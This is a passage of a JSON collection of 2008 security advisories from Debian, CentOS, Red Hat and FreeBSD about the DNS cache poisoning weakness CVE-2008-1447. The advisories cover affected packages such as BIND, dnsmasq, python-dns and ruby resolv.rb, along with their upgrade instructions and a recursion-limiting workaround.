cache poisoning,\nexploiting the limited entropy in a DNS transaction ID and lack of\nUDP source port randomization in many DNS implementations. 
Scott\nKitterman noted that python-dns is vulnerable to this predictability,\nas it randomizes neither its transaction ID nor its source port.\nTaken together, this lack of entropy leaves applications using\npython-dns to perform DNS queries highly susceptible to response\nforgery.\n\nThe Common Vulnerabilities and Exposures project identifies this\nclass of weakness as CVE-2008-1447.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.3.0-5.2+etch2.\n\nWe recommend that you upgrade your python-dns package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- 
---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2008-09-22T06:12:15", "published": "2008-09-22T06:12:15", "id": "DEBIAN:DSA-1619-2:7599F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00233.html", "title": "[SECURITY] [DSA-1619-2] New python-dns package fixes regression", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "centos": [{"lastseen": "2019-12-20T18:28:28", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0533-03\n\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols.\r\n\r\nThe DNS protocol protects against spoofing attacks by requiring an attacker\r\nto predict both the DNS transaction ID and UDP source port of a request. In\r\nrecent years, a number of papers have found problems with DNS\r\nimplementations which make it easier for an attacker to perform DNS\r\ncache-poisoning attacks.\r\n\r\nPrevious versions of BIND did not use randomized UDP source ports. If an\r\nattacker was able to predict the random DNS transaction ID, this could make\r\nDNS cache-poisoning attacks easier. 
In order to provide more resilience,\r\nBIND has been updated to use a range of random UDP source ports.\r\n(CVE-2008-1447)\r\n\r\nNote: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\r\nand 5 to allow BIND to use random UDP source ports.\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain a backported patch to add this functionality.\r\n\r\nRed Hat would like to thank Dan Kaminsky for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027120.html\n\n**Affected packages:**\nbind\nbind-devel\nbind-utils\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 3, "modified": "2008-07-09T01:20:56", "published": "2008-07-09T01:20:56", "href": "http://lists.centos.org/pipermail/centos-announce/2008-July/027120.html", "id": "CESA-2008:0533-03", "title": "bind security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-08T03:33:58", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0533\n\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols.\r\n\r\nThe DNS protocol protects against spoofing attacks by requiring an attacker\r\nto predict both the DNS transaction ID and UDP source port of a request. In\r\nrecent years, a number of papers have found problems with DNS\r\nimplementations which make it easier for an attacker to perform DNS\r\ncache-poisoning attacks.\r\n\r\nPrevious versions of BIND did not use randomized UDP source ports. If an\r\nattacker was able to predict the random DNS transaction ID, this could make\r\nDNS cache-poisoning attacks easier. 
In order to provide more resilience,\r\nBIND has been updated to use a range of random UDP source ports.\r\n(CVE-2008-1447)\r\n\r\nNote: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\r\nand 5 to allow BIND to use random UDP source ports.\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain a backported patch to add this functionality.\r\n\r\nRed Hat would like to thank Dan Kaminsky for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027114.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027115.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027116.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027117.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027118.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027119.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027121.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027122.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027126.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027127.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027128.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027129.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/039473.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/039474.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libbind-devel\nbind-libs\nbind-sdb\nbind-utils\ncaching-nameserver\nselinux-policy\nselinux-policy-devel\nselinux-policy-mls\nselinux-policy-strict\nselinux-policy-targeted\nselinux-policy-targeted-sources\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0533.html", "edition": 4, "modified": "2008-07-12T12:47:34", "published": "2008-07-08T22:25:27", "href": 
"http://lists.centos.org/pipermail/centos-announce/2008-July/027115.html", "id": "CESA-2008:0533", "title": "bind, caching, selinux security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:45:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols.\r\n\r\nThe DNS protocol protects against spoofing attacks by requiring an attacker\r\nto predict both the DNS transaction ID and UDP source port of a request. In\r\nrecent years, a number of papers have found problems with DNS\r\nimplementations which make it easier for an attacker to perform DNS\r\ncache-poisoning attacks.\r\n\r\nPrevious versions of BIND did not use randomized UDP source ports. If an\r\nattacker was able to predict the random DNS transaction ID, this could make\r\nDNS cache-poisoning attacks easier. In order to provide more resilience,\r\nBIND has been updated to use a range of random UDP source ports.\r\n(CVE-2008-1447)\r\n\r\nNote: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\r\nand 5 to allow BIND to use random UDP source ports.\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain a backported patch to add this functionality.\r\n\r\nRed Hat would like to thank Dan Kaminsky for reporting this issue.", "modified": "2019-03-22T23:42:40", "published": "2008-07-08T04:00:00", "id": "RHSA-2008:0533", "href": "https://access.redhat.com/errata/RHSA-2008:0533", "type": "redhat", "title": "(RHSA-2008:0533) Important: bind security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-08-13T18:46:43", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dnsmasq is lightweight DNS forwarder and DHCP server. 
It is designed to\nprovide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have made\nDNS spoofing attacks easier. dnsmasq has been updated to use random UDP\nsource ports, helping to make DNS spoofing attacks harder. (CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.", "modified": "2017-09-08T12:13:40", "published": "2008-08-11T04:00:00", "id": "RHSA-2008:0789", "href": "https://access.redhat.com/errata/RHSA-2008:0789", "type": "redhat", "title": "(RHSA-2008:0789) Moderate: dnsmasq security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "\nThe official ruby site reports:\n\nresolv.rb allow remote attackers to spoof DNS answers. This risk\n\t can be reduced by randomness of DNS transaction IDs and source\n\t ports.\n\n", "edition": 4, "modified": "2009-02-09T00:00:00", "published": "2008-08-08T00:00:00", "id": "959D384D-6B59-11DD-9D79-001FC61C2A55", "href": "https://vuxml.freebsd.org/freebsd/959d384d-6b59-11dd-9d79-001fc61c2a55.html", "title": "ruby -- DNS spoofing vulnerability", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "\nProblem Description:\nThe BIND DNS implementation does not randomize the UDP source\n\t port when doing remote queries, and the query id alone does\n\t not provide adequate randomization.\nImpact:\nThe lack of source port randomization reduces the amount of\n\t data the attacker needs to guess in order to successfully\n\t execute a DNS cache poisoning attack. 
This allows the\n\t attacker to influence or control the results of DNS queries\n\t being returned to users from target systems.\nWorkaround:\nLimiting the group of machines that can do recursive queries\n\t on the DNS server will make it more difficult, but not\n\t impossible, for this vulnerability to be exploited.\nTo limit the machines able to perform recursive queries, add an ACL in\n\t named.conf and limit recursion like the following:\nacl example-acl {\n 192.0.2.0/24;\n};\noptions {\n\trecursion yes;\n\tallow-recursion { example-acl; };\n};\n", "edition": 4, "modified": "2016-08-09T00:00:00", "published": "2008-07-08T00:00:00", "id": "655EE1EC-511B-11DD-80BA-000BCDF0A03B", "href": "https://vuxml.freebsd.org/freebsd/655ee1ec-511b-11dd-80ba-000bcdf0a03b.html", "title": "FreeBSD -- DNS cache poisoning", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}]}